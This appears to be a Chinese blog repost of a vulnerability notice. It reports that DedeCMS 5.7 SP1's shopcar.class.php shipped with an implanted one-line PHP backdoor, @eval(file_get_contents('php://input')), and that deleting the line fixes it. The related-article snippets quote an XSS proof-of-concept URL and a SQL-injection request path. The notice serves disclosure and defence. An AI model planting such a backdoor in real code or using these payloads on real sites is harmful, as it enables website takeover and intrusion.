DedeCMS 5.7 后门漏洞

最新推荐文章于 2025-01-13 22:09:57 发布

weixin_33895475

最新推荐文章于 2025-01-13 22:09:57 发布

阅读量642

点赞数

文章标签： php

DedeCMS V5.7SP1 UTF-8/GBK版本发现并修复了shopcar.class.php文件中的一句话后门漏洞，该漏洞通过@eval(file_get_contents('php://input'))植入。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

简要描述：

DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门

前几日下载并不存在此代码

详细说明：

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

漏洞证明：

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

修复方案：

删除@eval(file_get_contents('php://input'));

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_33895475

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

dedecmsv5.7sp1 文件包含和变量覆盖漏洞

小饼干的博客

06-28

1120

环境搭建：使用phpstudy，phpstudy版本2016，PHP版本5.4.45，mysql版本5.5.53 dedecms版本5.7 sp1 utf-8版环境搭建好以后安装dedecms，安装完成以后访问一下存在漏洞的地方在install/index.php文件中在29到33行中存在变量覆盖，这段代码的大概意思是依次对_GET,_POST,_COOKIE进行键值分离例如：_GET传入的参数是id=1，name=nfnf，在第一个foreach中先遍历_GET，此时$_request变为$_g

（四）mysql数据库总结和渗透测试相关漏洞整理

爱上卿的博客

01-16

2557

1.1 Mysql信息收集 1.端口信息收集 Mysql默认端口是3306端口，但也有自定义端口，针对默认端口扫描主要利用扫描软件进行探测，推荐使用：（1）IIS PUT scanner，直接填写3306端口，IP地址填写单个或者C段地址，速度还是挺快的。（2）nmap扫描nmap -p 3306 192.168.1.1-254 特定目标的渗透，可能需要对全端口进行扫描，可以使...

参与评论您还未登录，请先登录后发表或查看评论

dedecms官方后门获取你的站点信息

赵一舟的博客

03-09

383

$offUrl = "http://new"."ver.a"."pi.de"."decms.com/index.php?c=info57&version={$cfg_version}&formurl={$nurl}&phpver={$phpv}&os={$sp_os}&mysqlver={$mysql_ver}{$add_query}";

DedeCMS V5.7 Dialog目录下配置文件XSS漏洞

weixin_33829657的博客

03-21

246

漏洞地址及证明:/include/dialog/config.php?adminDirHand="/></script><script>alert(1);</script>

dedecms 5.7 一句话后门利用 exp

fengling132的专栏

04-22

1660

http://www.wooyun.org/bug.php?action=view&id=5416 shopcar.class.php 被植入一句话 @eval(file_get_contents('php://input')); 去官网下了一套回来，看了下代码， class MemberShops { var $OrdersId; var $productsId;

Web渗透与SRC漏洞发掘[初级渗透工程师]

2401_88858891的博客

01-13

806

（10）.Burp suite专题(二)Burp+XSSValidator前面XSS已经讲过了。Microsoft SQL Server手注之db_owner权限处理。漏洞挖掘之CSRF（二）——Refrer和token的突破。（9）Burp suite专题(一)Burp+sqlmap。Microsoft SQL Server手注之布尔型盲注。Microsoft SQL Server手注之延时型盲注。（11）Burp suite专题(三)Burp+Xray。

awd的批量脚本 pwn_CTF线下赛AWD套路小结

weixin_39784972的博客

12-20

1951

CTF线下赛AWD套路小结本文已在先知社区发表，欢迎访问，链接h最近打了2场CTF线下赛，把AWD模式中的一些小套路做一些总结，本人web狗，二进制部分就不班门弄斧了。一、AWD模式简介AWD：Attack With Defence，比赛中每个队伍维护多台服务器，服务器中存在多个漏洞，利用漏洞攻击其他队伍可以进行得分，修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器，服务器(多数为Linu...

织梦CMS 手机访问域名被恶意跳转解决方案安全设置

最新发布

03-09

awd初级思路

weixin_44255856的博客

09-09

3966

网络拓扑 ssh复制到电脑上修改 ssh密码数据库密码 ssh密码修改：sudo passwd user mysql密码修改： set password for 'user'@'localhost' = password('newpass'); 备网站源码数据库备份网站源码使用Winscp等工具下载var/www/html下的文件，备份 tar -zcvf web.tar.gz /v...

【dedecmsv5.7】DEDECMS安装之后需要做的事情！DEDECMS去除所有自带后门和漏洞的方法（未写完）

技术笔记

10-15

1525

Dedecms安全步骤，安装之后的操作（1）将文件夹dede改名为其他，比如 /fukedh.com/（2）搜索ad.dedecms.com，文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm 删除如下这一段：<!--<script type="text/javascript" src="<?php echo $updateHost;?

php上传后门,Dedecms疑似被植入后门上传PHP后门可控制整个网站

weixin_28871989的博客

03-10

372

Admin5站长网2月21日消息，昨日乌云漏洞报告平台()发布漏洞报告，称国内知名开源CMS软件Dedecms被入侵种植后门，影响使用dedecms的网站和企业，后门代码在/include/shopcar.class.php中，希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试，可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站...

Dedecms被曝疑似植入后门可成功控制网站

weixin_33994444的博客

03-22

222

为什么80%的码农都做不了架构师？>>> ...

DEDECMS 5.7 后门 exp再修改版

收集盒 Book box

05-11

1232

别说明：在舞林给出的exp的基础上修改而来！使自定义目标网站和目录更方便。（http://forum.cnsec.org/thread-82493-1-1.html）先前发的那个修改版由于时间仓促没写判断目标是否存在漏洞的代码，刚才补上了。 PS：代码写的太烂，英语没学过几个单词，让大家见笑了，发现程序的bug欢迎提醒我。另外，写这个代码出于学习PHP的目的，如果有人用代码造成任何后

一种奇特的DEDE隐藏后门办法

IT技术宅-北方的刀郎

03-21

2837

? 15:24 / 28一种奇特的DEDE隐藏后门办法单位某站用的dedecms,今天被某黑阔getshell了，提交到了wooyun.为了还原黑阔入侵的手法，用鬼哥的getshell测试居然没成功, 是不是getshell过一次，再次就不会成功呢？无奈只能打包代码，用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件，文件代码如下：ortant; paddin

织梦DEDECMS去除一切自带后门和破绽的办法

PHP错误汇总

09-26

859

DEDECMS去除一切自带后门和破绽的办法 DEDECMS去除所有自带后门和漏洞的方法(DEDE安装之后需要做的事) Dedecms安全步骤，安装之后的操作 1 将文件夹dede改名为其他，比如 /dede58.com/ 2 搜索ad.dedecms.com，文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm 删除如下这一段： <!--<script type="text/javascript" src="<?ph

织梦v5.7默认开发版后台

SEO资源下载

01-14

174

介绍只有UTF8版本，支持 PHP7版本后台，下载根据使用说明安装，美化整体后台，操作快捷流程。下载地址 http://www.bytepan.com/dwT7exAs48v 图片

dedecms 5.7 目录结构

weixin_30787531的博客

02-23

118

|a　　　　　　　　　　　　/生成HTML的目录，老版本为html文件夹/|data　　　　　　　　　　/程序生成常用数据保存目录/||admin 　　　　　　　　/保存系统后台常规配置，如作者、快速导航、来源这些内容,常以你文本格式存放/||backupdata 　　　　　/数据库备份存放目录，可以在系统后台设置处修改...

dedecms的漏洞

https://www.cnblogs.com/zpchcbd/

05-10

2966

5.7 sp1 爆数据库 /plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&a...

dedecms 5.7 sp1 csrf漏洞

03-09

### 关于DedeCMS 5.7 SP1版本中的CSRF漏洞 #### 漏洞详情 DedeCMS V5.7 UTF8 SP1 版本存在多个跨站请求伪造（CSRF）漏洞，这些漏洞允许攻击者通过构造特定的HTTP请求，在未经用户同意的情况下执行操作。具体来说：...